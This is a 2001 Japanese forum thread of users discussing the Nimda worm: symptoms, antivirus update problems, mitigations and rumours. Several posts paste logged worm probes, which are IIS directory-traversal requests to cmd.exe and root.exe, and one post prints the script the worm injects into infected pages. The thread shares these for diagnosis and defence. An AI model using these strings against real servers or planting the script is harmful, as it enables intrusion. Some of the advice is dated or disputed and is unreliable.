>>796 「含まれる」でやると、ファイルの中の内容を読みに行くんだと思う。
だから、ファイル名が*.elmでなければ大丈夫なはず。
798 :
:01/09/19 14:57 ID:tFyg/UXY
感染してるかどうかってどうやつて調べるの?
799 :
:01/09/19 14:57 ID:eTf3hr.k
801 :
名無しさん :01/09/19 14:59 ID:K0x/0bfc
感染したクライアントから感染してないIISにアクセスするとIISは感染するの?
802 :
ななしさん :01/09/19 15:01 ID:1wQ9QV6U
>>797 即レスありがとうございます。
カナーリ安心しました(´ー`)ノ
803 :
:01/09/19 15:02 ID:dUAYMCrs
>>801 IISがパッチ適用済みでなければ感染する可能性があります。
805 :
名無しさん :01/09/19 15:04 ID:K0x/0bfc
>>804 ども、やっぱクライアントからも攻撃パケットおくるのか。たちわりーな。
当分沈静化しそうにないな
806 :
名無しさん :01/09/19 15:05 ID:pxo5up2Q
VB2001使ってるんだけど、「パターン番号941から対応」、とトレンドマイクロのページに 書いてるのだけど、アップデートしようとしても更新されないのはなぜでしょうか...。
807 :
803 :01/09/19 15:06 ID:dUAYMCrs
>>803 >>806 インターネットにアクセスするのにproxyを使ってない?
無くてもアクセスできる環境ならproxyを外すと良い。
809 :
:01/09/19 15:08 ID:e04NWwrc
>>806 941に更新されたけど? つーか、俺のところはエンジンがアップデートしてくれない。なぜだ。
810 :
ナナシサソ :01/09/19 15:08 ID:uy8Pfu/w
>>782 の内容で先頭の検索、
「*.eml」ってのは意味ないだろ…修正しておいてよ、貼ってる人…
なんとなくhttpd起動してみた。 オプション プロクシ/キャッシュのアクセス制御タブを、 アクセス許可=127.0.0.1 アクセス拒否=*.*.*.* にしたが、これで簡易ファイアウォールになったのかな?
812 :
:01/09/19 15:09 ID:dhdAcbVI
813 :
803 :01/09/19 15:09 ID:dUAYMCrs
ブラウザはfubでオミトロン使用。 オミトロンを落としてブラウザの設定もproxy切ってやってみたけどダメ。 ちゃんとキャッシュされないっぽい…。
814 :
:01/09/19 15:10 ID:/LsUGfPI
>>809 アップデートには登録が必要です。
(体験版の方、割れてる方、シリアルパクってる方は使えません)
ひょっとして漏れは間違ったことをしているのだろうか… いや、きっとそうだろうな(w
816 :
:01/09/19 15:13 ID:Y5AkCUiQ
818 :
:01/09/19 15:13 ID:gTVqO6AI
>>806 俺もアップデートされない。なぜなんだろう。9月14日でパターンファイルの更
新が止まっている。
819 :
うー :01/09/19 15:14 ID:4qbxbrYc
オンラインスキャンでドライブ全体を検索したが ウイルスの感染はしていない。(パターン941で) さらに、ハードディスク内について以下条件でファイル検索したが 見つからない *.eml readme.exe MEP51B3.TMP.EXE でも、再起動するたびCドライブが無条件で共有になる・・ OSはWIN2Kで前から5.5のSP2です。 同じ症状方います?
820 :
:01/09/19 15:14 ID:dUAYMCrs
821 :
806 :01/09/19 15:14 ID:pxo5up2Q
822 :
803 :01/09/19 15:16 ID:dUAYMCrs
実は数日前からこの症状が出てた。
たぶん
>>818 と同じ9/14くらいから。
>>819 "C$" という名前でCドライブが共有されるのはWindowsのデフォルトの動きだ。
今回のウイルスとは無関係。
824 :
818 :01/09/19 15:17 ID:gTVqO6AI
>>820 ありがとう。俺の場合、途中までのダウンロードすらしない。最初は混んでるのか
と思っていたが。ちなみに、ユーザー登録はしてる。自分で購入したから。
825 :
803 :01/09/19 15:18 ID:dUAYMCrs
VB2001をさっき再いんすとろーるしたから いつからアップデート失敗してるかはログが残ってないけど。
ログにこんなのが2件ほど。 ------------------------------------------------------ 64.107.156.243 - - [19/Sep/2001:15:03:03 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 240 64.107.156.243 - - [19/Sep/2001:15:03:04 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:05 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:06 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:07 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:08 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:09 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:10 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 400 206 64.107.156.243 - - [19/Sep/2001:15:03:10 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 400 206 64.107.156.243 - - [19/Sep/2001:15:03:11 +0900] "GET /sc?/c+dir HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:12 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 206 64.107.156.243 - - [19/Sep/2001:15:03:12 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 206 64.107.156.243 - - [19/Sep/2001:15:03:13 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:14 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:15 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 64.107.156.243 - - [19/Sep/2001:15:03:15 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
827 :
819 :01/09/19 15:20 ID:4qbxbrYc
828 :
818 :01/09/19 15:20 ID:gTVqO6AI
>>803 「ログの表示」でいつから更新が止まってるかわかるよ。
829 :
名無し :01/09/19 15:20 ID:9jLRYBy.
トレンドマイクロに電話殺到。
830 :
:01/09/19 15:20 ID:oaR/VUnY
>>819 同じ状態です。
でもそれって確かもともと、W2Kでadministratorまたはそれと同等の権限をもつ
ユーザでログオンするとそうなったんじゃなかったかな?
「マイネットワーク」で自分のPCみて、Cドライブが見えてなければ
大丈夫なはず。
831 :
818 :01/09/19 15:20 ID:gTVqO6AI
>>803 ごめん。次の書きこみ読んでなかった。再インストールしかないのかな。
ちなみにうちはWin98だから↑のは関係ないよね?
833 :
803 :01/09/19 15:21 ID:dUAYMCrs
>>828 再いんすとろーるしたからログ残ってないよ。
そうでなくても定期的にログ消してたし。
834 :
:01/09/19 15:21 ID:JgAOGVbo
スレッド一覧クリックしたら、 文字化けしたぞ!!!! おれだけか???
835 :
:01/09/19 15:22 ID:gqFNfIjY
836 :
830 :01/09/19 15:22 ID:oaR/VUnY
837 :
:01/09/19 15:23 ID:m7DA.Smk
WINMXはだいじょうぶですか?
鯖が妙に重いんだが… ウィルスのせい?
839 :
:01/09/19 15:24 ID:YhkDggS.
840 :
:01/09/19 15:24 ID:xbjhX50U
たのむ誰か、相撲取りがくみあってキスしてヘンな音楽流れてる ブラクラたのむ!!
841 :
803 :01/09/19 15:24 ID:dUAYMCrs
現象を詳しく書くと、 タスクトレイにあるVB2001アイコンを右クリック-「メイン画面を起動」 「アップデート」でアップデートボタンをクリック。 するとカプセルがチラチラしだしてファイル検出を始める。 ダウンロードし始めるのかな?と思うとキャッシュを探し出してきて ダウンロード終わっちゃう。インストールには進まない。
>>835 ほぼ安心できると思います。あとは別のウイルスやワームに引っかからないように
常日頃からのチェックが大事。
843 :
803 :01/09/19 15:26 ID:dUAYMCrs
ネットワークのエラーとか、そういう類のアラートは出ない。
844 :
ぺ ◆lPYiMAEY :01/09/19 15:27 ID:.iBHXJik
VB2001、漏れも9/14頃からアップデートできなかったけど、 昨日やってみたらどういうわけかできちゃった。 何でだろ? しかもアップデートボタン押して5分くらいしてからダウソ 開始されて、さらに5分くらいかかってダウソ終了。 ・プログラムバージョン 8.06 Build1167 ・エンジンバージョン 5.46 ・パターン番号 940
845 :
818 :01/09/19 15:27 ID:gTVqO6AI
>>803 うちも全く同じ。別におかしなことした覚えはないんだけどね。
>>844 パターンファイルは "941" が最新です。
再度アップデートしてみることをお勧めします。
847 :
818 :01/09/19 15:29 ID:gTVqO6AI
>>844 そうなんだ。でも、俺の場合、ボタンが「アップデート」に戻るから作業を中止
してるっぽい。
848 :
:01/09/19 15:31 ID:S4B3xEUY
ザ・ワイドでやるぞ!
849 :
:01/09/19 15:31 ID:dYZL6rwo
ニッテレ見れ
850 :
:01/09/19 15:31 ID:gsbkGkZw
わいどみろ!
851 :
818 :01/09/19 15:31 ID:gTVqO6AI
もう一度アップデート試したら、「プロクシ・・・」とか出た。エラーには 違いないが、前に進んだ気がする。書きこむため、クッキーONにしてるからか な。
852 :
:01/09/19 15:32 ID:gsbkGkZw
ウイルス草野!
853 :
ぺ ◆lPYiMAEY :01/09/19 15:32 ID:.iBHXJik
THE WIDE見るべし。 MSのウィルスこれからやるよ。 >846 いや、ところが940から941にアップデートしてくれないんだわ(w どうしたものか・・・
854 :
:01/09/19 15:32 ID:iaQQZmng
855 :
:01/09/19 15:33 ID:Yqm8oZbI
2チャンでるか?
856 :
:01/09/19 15:33 ID:zvPGo23.
THE WIDEはじまったね。 ニムダってハングル?
857 :
:01/09/19 15:33 ID:/LsUGfPI
おーでたでた。
858 :
:01/09/19 15:33 ID:5GM4XpGo
今、日テレでやってる!!
859 :
:01/09/19 15:34 ID:uoDPka6U
ワクチン出たのか
860 :
:01/09/19 15:34 ID:liuCqwA2
はやっ
861 :
:01/09/19 15:34 ID:N4U8iOCw
ワクチンが出来てたのか
862 :
:01/09/19 15:34 ID:zvPGo23.
863 :
:01/09/19 15:34 ID:liuCqwA2
おわるのがね
864 :
:01/09/19 15:34 ID:hQ058jOA
うちのIEは4なんだけど、どう?
865 :
:01/09/19 15:34 ID:/LsUGfPI
おわった・・・速報だけだったな。
866 :
:01/09/19 15:34 ID:dvZoh28Q
おかざきじさつか〜
>>853 とりあえずオンラインスキャンを試して見れ。
検出だけは出来るから。
868 :
:01/09/19 15:35 ID:vPl1Iwow
ラディンの仕業か?ネットテロだな
869 :
:01/09/19 15:35 ID:oaR/VUnY
>>856 ガイシュツだとおもうが、
ニムダ -> nimda -> admin
870 :
:01/09/19 15:35 ID:fAFEbzjQ
テロと関係あるのか
871 :
ニムダ :01/09/19 15:36 ID:H8MzGsO6
ワクチンどこに!?
872 :
:01/09/19 15:36 ID:gsbkGkZw
草野の仕業だ
873 :
:01/09/19 15:36 ID:lITloGcw
) /i ヽ:;:::‐‐,ヽ / ヽ!:::::レ――、 ,‐''ニニニ''''> i::::::::r ! !' L:::! ir_ロ_ラ;ヽiirイ iコ ≧: !::::::!j i !:::! ヲ‐)| i| `二ニ |::::::ノ r! !;;;iイ ノ ! γヽ_ .:;ii i i i. / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ; ハ ト,、_, r´‐、、 ;;i:::::::;;! | | | `;;;ヽ (;;;;;;;;;_:_:;,,>jヽ;;;;;;;;;;;;;! i i < 濡れ衣ムカつく。 :>::;;;iiト;;;;,,,,,,,,,,;;;``;;ii;;;;;;;;:::::| .| | _/, ;:::::ヽ;::::::';:.,;:::..::::::::::::::;;;::i ト―. \____________
874 :
:01/09/19 15:36 ID:0JDuiGy.
各ソフト用の定義ファイルは出てるけど、 駆除ツールはまだ出てないよな? >駆除: >Symantec Security Responseは、 >このワームの駆除に必要な手順を調査しています。
875 :
:01/09/19 15:36 ID:gsbkGkZw
1000
876 :
856 :01/09/19 15:36 ID:zvPGo23.
>>869 さんくす。
ウリがネットにつないでいるのはまくだけなので、
この関係のスレ読んでなかったニダ。
877 :
:01/09/19 15:37 ID:y58DMlOA
ワクチンはどこにあるのかね?
878 :
:01/09/19 15:37 ID:YBuh9v9U
ホットメールも危険なの、今?
879 :
:01/09/19 15:37 ID:/LsUGfPI
>>877 対策ができたらどっかで駆除ツールが出ると思われ。
880 :
803 :01/09/19 15:38 ID:dUAYMCrs
881 :
:01/09/19 15:38 ID:ecPQDk4k
IE3は?だいじょうぶ?
882 :
:01/09/19 15:40 ID:/LsUGfPI
>>881 IE3Java古いからどうかな・・・たぶん実行されないかな?
883 :
ぺ ◆lPYiMAEY :01/09/19 15:40 ID:.iBHXJik
>867 さっきやったよ。 先月からIE5.5SP2使ってるし、今朝IE6にアップデートしたから 大丈夫だよ多分。JavaもJavaScriptもいつも切ってるし。
884 :
:01/09/19 15:40 ID:HMlseq/g
再起動する度にmepが作成される
885 :
:01/09/19 15:41 ID:0JDuiGy.
>>881 IE3.02だとMSNが殺風景だった気がするよ
886 :
_ :01/09/19 15:41 ID:jzKbqutU
近所に来てる移動アイスクリーム屋がうるさくてしょうがない。 メリーゴーランドみたいな音楽をガンガン鳴らしてる。 死んでくれ。
887 :
:01/09/19 15:41 ID:/LsUGfPI
882の追加。 感染サイト行ってもダウンロード拒否すれば大丈夫。
888 :
:01/09/19 15:42 ID:hQ058jOA
>>882 4は?
つかJavaで実行されるの?Javascriptじゃないの?
889 :
:01/09/19 15:42 ID:gsbkGkZw
ニュースサイトが感染しているらしいが、 感染したリストない?
890 :
:01/09/19 15:42 ID:OqBIM1So
>>834 >スレッド一覧クリックしたら、
>文字化けしたぞ!!!!
フレーム単独で開いている状態で、subback.htmの拡張子をhtmlに変えて
読み込みし直すとちゃんとしたのが見れるYO!
先日の2ちゃんのシステム改変時に、htm→圧縮ファイル、html→非圧縮
ファイルって事になったらしく、前者の場合は環境によっては文字化けする
みたいdeath。詳しいことは全然知らないけど。
891 :
現場の名無しさん :01/09/19 15:43 ID:rMHoLCL6
IE6にしてたのにヤラレタ。 ウイルスバスターで一応の駆除はしたが…。 サイト周りはしてなかったのに。 メールでばら撒かれたのかな。
892 :
:01/09/19 15:43 ID:zYHPZHs6
>>888 javascriptで実行される。JAVAじゃない。
4は多分感染する。
だけどJavascript切れば大丈夫だって。
893 :
:01/09/19 15:43 ID:gTVqO6AI
894 :
:01/09/19 15:44 ID:/LsUGfPI
>>888 不安ならJavaもJavascriptも切っとけ。
895 :
:01/09/19 15:44 ID:SjYSBaeo
>>891 IE6で駄目なの?
IE5.5SP2なら大丈夫?
896 :
:01/09/19 15:44 ID:Cxmi7gFk
win98は大丈夫なの?
897 :
818 :01/09/19 15:45 ID:gTVqO6AI
>>803 ありがとう。そっちのスレの動きもチェックするよ。
898 :
:01/09/19 15:45 ID:uoDPka6U
899 :
:01/09/19 15:45 ID:NcSzOudQ
農水省、中日新聞、山梨大学やばいそうですbyTBS
900 :
:01/09/19 15:45 ID:zYHPZHs6
>>893 見ても大丈夫だけど、ちょっと前から開けなくなった。
混みすぎて落ちたかな?
901 :
:01/09/19 15:46 ID:ImDE9Pwc
これを機にMa.....
902 :
:01/09/19 15:46 ID:/LsUGfPI
>>896 IEが5.01SP2または5.5SP2かネスケ使ってるなら一応大丈夫。
ただ、念のためJavascript切っとけ。
903 :
:01/09/19 15:47 ID:YhkDggS.
とりあえずIE6入れてみた。
904 :
_ :01/09/19 15:47 ID:o12ilfao
905 :
:01/09/19 15:48 ID:SjYSBaeo
906 :
:01/09/19 15:48 ID:JgAOGVbo
>904 まったくだよね。
907 :
818=893 :01/09/19 15:49 ID:gTVqO6AI
908 :
:01/09/19 15:50 ID:zPCkt1Os
909 :
:01/09/19 15:50 ID:zYHPZHs6
>>903 6でもセキュリティ関係全部ONだと感染するらしい。
とりあえず、JavaScriptは切れ!
で、DLとかActiveXとかも常識としてメッセージ表示にしろ!
910 :
:01/09/19 15:50 ID:QpsLGwxM
>>883 >先月からIE5.5SP2使ってるし、今朝IE6にアップデートしたから
どうやってやるの?
911 :
:01/09/19 15:50 ID:yPiXQHbc
Javascriptを切るってどうすればいいの?
912 :
:01/09/19 15:50 ID:7jAGOnQE
前スレ見ようと思ったらなんか違うぞ・・・
913 :
:01/09/19 15:51 ID:dARd0D.c
MSN見ても、だいじょぶ?
>>895 バスターでチェックしたらリードミーの実行が出てきた。
メールから感染したと思われる。
C:\WINDOWS\Temporary Internet Files\Content.IE5\KYOUX70K\wtf[1].eml (readme.exe),
TROJ_BKDOOR.OG,
↑ログ。
915 :
:01/09/19 15:51 ID:NcSzOudQ
>>907 ほんとだ、山梨学院だねごめん。まちがえちゃった
916 :
:01/09/19 15:52 ID:AoixoLv2
トレンドマイクロのオンラインウイルススキャン重し
917 :
:01/09/19 15:52 ID:J75YRgkw
ie5.5とie6.0ってどっちが安定してるんだ?
状況報告ver1.04(前編) 対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 6.システムのスローダウン 7.リソースの消耗 8.他のファイルに潜伏する。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。 LANによる感染 社内に一人でも対策してないひとがいてノーパスとかにしていた場合 LANの共有フォルダを使っても自己増殖する。 感染鯖 ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> が追加される。
919 :
:01/09/19 15:52 ID:FbLx1hvw
なんか昨日辺りHP開いたら変なファイルダウソしちゃったっぽい・・・・・。 やばいよね。IE5.0なんだけど。 どうしよう〜〜〜〜〜。なんか全てのファイルの拡張子がなくなってるんだけど これってウイルスのせいですか?
920 :
:01/09/19 15:53 ID:kduBvuoU
今来たんだけどまったく意味がわかりません! 何をどうすればどうなるんですか?
921 :
:01/09/19 15:53 ID:zYHPZHs6
>>911 そういうのはスーパー初心者用のスレで聞いてくれ!
>>914 それは感染したんではなくて、IEのキャッシュを拾ってるだけ。
意図的に実行していなければ感染しない。
923 :
:01/09/19 15:53 ID:dARd0D.c
>java関連とダウンロードのファイルのダウンロードを不許可。 ここの具体的なやり方がわからないのですが。
924 :
age :01/09/19 15:54 ID:QfxkG5Mw
あわててIE5.5 SP2をウィンドウズアップデート行って入れたんだけど、 ひょっとしたら前から SP2 だったかも。 SP2 っていつ頃から出てるの? アップデートは月1ぐらいでしてるんだけど・・・。
925 :
続き :01/09/19 15:54 ID:AmEHqk4c
状況報告ver1.04(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm 2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
*.emlが大量にHITした際は確定。
ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
そうでないときは後者2個を削除して様子を見る。
ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)
感染時の対応
感染してしまった後は、アップデートしても無意味。
とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。
ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
926 :
:01/09/19 15:56 ID:3AnOZHiA
>904 でもどっかにお詫び見たいの出してなかった?
927 :
:01/09/19 15:56 ID:J75YRgkw
デコードってどうするの?
>>922 そうなんだ。駆除したとかメッセージがでたから
やられたと思ったよ
930 :
:01/09/19 15:58 ID:AmEHqk4c
>>923 やじるし通りに手順を踏んで、そこにラジオ(チェックボックスみたいの)がいっぱいあるから
そこで『java』って書いてある全部と、『ダウンロード』『ファイルのダウンロード』って項目を
全部不許可。
事態が収束したら、セキュリティー中でOKだからとりあえず今はこうしといて。
931 :
:01/09/19 15:58 ID:J75YRgkw
readme.exeをデコードしてみたいのだが どうすればよい?
932 :
ieie :01/09/19 15:58 ID:kRb7kVxA
ie6ってどこにあるの?
933 :
:01/09/19 15:58 ID:y58DMlOA
ワクチン出来たらしいからもうちょっと待ちましょう。
934 :
:01/09/19 15:58 ID:ecPQDk4k
みんなIE3以下にアップデートしたほうがいいんじゃないか?
935 :
初心者さん達へ『*.eml』について :01/09/19 15:58 ID:/pyIBbxs
一応、念のために説明すると*.emlはメールファイルのことで 『*.eml』の意味は*.emlという名前のファイルではなく.emlと言う拡張子 の付いたファイル全部検索しろと言う意味で、身に覚えのない数以上 のファイルが検索されたら感染を疑ってみるべきでしょう。
936 :
:01/09/19 15:58 ID:/hOBMOFw
バージョン情報の更新バージョンがSP2になっているんですが、 これは大丈夫ってこと?
>>928 Temporary Internet Files以外で発見したら、それは感染してることになるので、
駆除後再度チェックすることをお勧めする。
938 :
:01/09/19 15:59 ID:gTVqO6AI
関係ないけど、マイドキュメント内に capt.1000253440terrorist_attacks_xnyr316 とかいうファイルがあってびびった。
939 :
LINUX使い :01/09/19 15:59 ID:tLF66/ns
931はあほ。死ねよ!
940 :
森の妖精さん :01/09/19 15:59 ID:LJxX308I
いま、自宅のサーバーのアバッチのエラーログ みてたら、攻撃されてるわされてるわ。笑
941 :
ぺ ◆lPYiMAEY :01/09/19 16:00 ID:.iBHXJik
942 :
:01/09/19 16:00 ID:zYHPZHs6
>>934 それはアップデートっていわないYo!
しかもゲイツの陰謀でバージョンを下げる事は出来ない。。。。
943 :
:01/09/19 16:01 ID:0/JZu1FA
IE6入れときゃOKかい?
944 :
:01/09/19 16:01 ID:JHoJO7iU
おいっ!!! てめーら、全員初心者板逝けや
945 :
:01/09/19 16:02 ID:ecPQDk4k
946 :
:01/09/19 16:03 ID:WkylJWgg
あのDL画面がウイルスだったのか・・・。 うちは初めからIE6だったからいいけど
947 :
:01/09/19 16:03 ID:JgAOGVbo
age
948 :
:01/09/19 16:03 ID:VncxlqhA
ガイシュツだったらすまん アクセスログに 23:17:52 /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 23:17:49 /d/winnt/system32/cmd.exe 23:17:56 /scripts/..%5c../winnt/system32/cmd.exe 23:17:55 /scripts/..%5c../winnt/system32/cmd.exe 23:17:50 /scripts/..%5c../winnt/system32/cmd.exe 23:17:47 /scripts/root.exe 23:17:48 /MSADC/root.exe 23:17:54 /scripts/..タッ../winnt/system32/cmd.exe 23:17:52 /scripts/..チ../winnt/system32/cmd.exe 23:17:50 /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 23:17:56 /scripts/..%5c../winnt/system32/cmd.exe 23:17:51 /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 23:17:57 /scripts/..%2f../winnt/system32/cmd.exe 23:17:53 /scripts/..タ/../winnt/system32/cmd.exe 23:17:48 /c/winnt/system32/cmd.exe 23:17:54 /scripts/..チ・./winnt/system32/cmd.exe こういうのがあったけど、これが感染したってこと?
今回の騒ぎは「2ちゃんねらー」に限っては今日で解決しそう?
950 :
ieie :01/09/19 16:04 ID:kRb7kVxA
ie6はどうよ。やっぱりよさげですか?
951 :
:01/09/19 16:04 ID:rJO4rUQE
一番注意して欲しいオサーン達に限って 警告してもうわのそら
953 :
ななしーさん :01/09/19 16:05 ID:FF9YYw4I
ie6でも実行すれば感染しちゃうらしい。 てかメール経由だと感染するのか?
954 :
森の妖精さん :01/09/19 16:05 ID:LJxX308I
今もあったよ。まったくなあ。。 [Wed Sep 19 16:01:05 2001] [error] [client 165.76.伏字.250] File does not exist: / www/htdocs/default.ida
955 :
:01/09/19 16:05 ID:jhDeJex2
957 :
:01/09/19 16:06 ID:gTVqO6AI
959 :
名無し :01/09/19 16:07 ID:GEWbAhZY
お祭りワショーイ!!
960 :
あほです :01/09/19 16:07 ID:p8C2sJrw
ネスケはどうよ?
961 :
ナナシサソ :01/09/19 16:08 ID:uy8Pfu/w
こっちにも一応。
現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm ・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル(README.EXE)を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。
>>953 Windows(WIN32)環境なら実行してしまえば必ず感染すると思う。
不用意に知らないファイルを実行しないこと。
963 :
1 :01/09/19 16:09 ID:qXfjSzVU
1
964 :
1 :01/09/19 16:09 ID:qXfjSzVU
10
965 :
:01/09/19 16:09 ID:KUa1jsG2
966 :
:01/09/19 16:11 ID:oaR/VUnY
>>961 そこのURL、さっきから何度アクセスしても「ページを表示できません」
なんだよね。
貼り付けたら、MSNサーチが「ありません」っていってくるし。
967 :
:01/09/19 16:12 ID:m9yCiymc
次スレ、もう立ってるの?
968 :
:01/09/19 16:12 ID:jxNp0hS2
中日新聞のサイトではこのウィルスの記事あるのかな? sp2あててあるけど、みずから確認に逝く勇気ない
969 :
:01/09/19 16:14 ID:Gg8nxNaA
感染したemlファイルをデコードするとどうなるの?
970 :
次スレテンプレート :01/09/19 16:14 ID:UPLKrEJ6
971 :
1000 :01/09/19 16:16 ID:qRpus5jE
今だ!1000番ゲットォォォォ!!  ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´ ∧∧ ) (´⌒(´ ⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡  ̄ ̄ (´⌒(´⌒;; ズザーーーーーッ
972 :
1000 :01/09/19 16:17 ID:qRpus5jE
今だ!1000番ゲットォォォォ!!  ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´ ∧∧ ) (´⌒(´ ⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡  ̄ ̄ (´⌒(´⌒;; ズザーーーーーッ
973 :
名無し :01/09/19 16:19 ID:GEWbAhZY
974 :
:01/09/19 16:19 ID:oaR/VUnY
じゃあ、980が次スレたてるってことで。
975 :
975 :01/09/19 16:22 ID:UPLKrEJ6
975
976 :
_ :01/09/19 16:22 ID:CqzFKTZs
自分宛にテストメール送ってREADME.EXEがくっついてきたらビンゴ っていう確認方法はだめ?
977 :
1000 :01/09/19 16:22 ID:3dIdB1mI
1000
978 :
976 :01/09/19 16:22 ID:1SmjZecc
tyjms
979 :
:01/09/19 16:23 ID:B.L/2Ca2
今だ!1000番ゲットォォォォ!!  ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´ ∧∧ ) (´⌒(´ ⊂(゚Д゚⊂⌒`つ≡≡≡(´⌒;;;≡≡≡  ̄ ̄ (´⌒(´⌒;; ズザーーーーーッ
980 :
:01/09/19 16:23 ID:rhA4bL0E
ワクチンまだ?
981 :
ニダ? :01/09/19 16:23 ID:iAsksBJ.
【速報】文部科学省地震調査研究推進本部のホームページにも新種ウイルス「Nimda(ニムダ)」が感染
982 :
:01/09/19 16:24 ID:nUNFugdc
っていうか、さっきメール起動したら120通くらいきてるんですが・・・・
983 :
:01/09/19 16:24 ID:UPLKrEJ6
984 :
:01/09/19 16:24 ID:d.PADzGo
1000
985 :
:01/09/19 16:24 ID:6Ah5JbSc
┌────────────────────┐ |┏━━━┓ 郵 便 は が き │ │┃ ∧,,∧ ┃年┏━┳━┳━┓┌‐┬‐┬‐┬‐┐│ │┃(´∀`)┃賀┃1 ┃1 ┃5 ┠┤0│0│5|2││ │┃( )┃ ┗━┻━┻━┛└‐┴‐┴‐┴‐┘│ │┗━━━┛ │ │ 赤 │ │ ┏━┓ 羽 │ │ ┃訴┃ 西 北 │ │ ┃ ┃ 二 │ │ ┃状┃ 村 丁 │ │ ┃ ┃ 目 │ │ 谷 ┃在┃ 博 31 │ │ 澤 ┃ ┃ 番 │ │ 動 ┃中┃ 之 16 │ │ 物 ┗━┛ | │ │ 病 一 │ │ 院 様 三 │ │ 一 │ │ 一 │ │ 号 │ │ [][][]-[][][][] │ │┏━━━━┓┏━━━━━┓┏━━━━━┓│ │┃ A2043組┃┃ お年玉クジ┃┃ 00486680┃│ │┗━━━━┛┗━━━━━┛┗━━━━━┛│ └────────────────────┘
986 :
:01/09/19 16:24 ID:/pyIBbxs
1
987 :
:01/09/19 16:25 ID:1UJ2cJHQ
988 :
:01/09/19 16:25 ID:zIx9bHqk
うおオレも100通来てる・・・
989 :
:01/09/19 16:25 ID:6Ah5JbSc
